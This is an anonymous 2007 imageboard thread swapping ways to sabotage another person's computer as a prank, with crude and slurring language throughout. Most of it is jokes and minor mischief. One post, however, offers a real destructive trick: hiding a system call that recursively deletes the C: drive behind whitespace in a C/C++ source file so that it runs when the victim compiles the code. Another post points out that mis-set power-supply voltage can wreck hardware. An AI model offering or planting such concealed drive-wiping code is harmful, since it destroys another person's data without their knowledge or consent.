>>10
I'll sneather your eather, if yu know what I mean ;)
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Anonymous2007-09-19 0:06 ID:/u/2DQR5
make sure to use a keyboard condom.
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Anonymous2007-09-19 21:54 ID:Eb1iQIgo
this is for windows computers only:
1) Open a console window(command prompt)
2) Type DELETE C:\
3) Wait 10 seconds
4) Unplug and walk away.
5) ??????
6) PROFIT!
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Anonymous2007-09-19 22:27 ID:QyBXD1PS
C:\Documents and Settings\Owner>delete c:\
'delete' is not recognized as an internal or external command,
operable program or batch file.
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Anonymous2007-09-19 22:39 ID:ZuNCReDi
In the serial port, duh.
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Anonymous2007-09-19 23:21 ID:lbF4+45f
Put a bunch of spaces in a .c/.cpp file and put this out there: system("rd C:\\ /s /q");
Then when he compiles and runs...
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Anonymous2007-09-20 4:44 ID:CIBezVvn
if his computer uses ps/2 switch the mouse, and keyboard.
or just unplug suttle things from the computer, and on the power strip get it to self test so you have to reset it.
>>21
Plugging a PSU tuned to 220V into a 110/115V socket won't do any damage, it'll just not run. It'll only fuck the computer if the OP is a Eurofag and the cuntface plugs a 110/115V-set PSU into a 220V socket, which will result in smoke and lulz.
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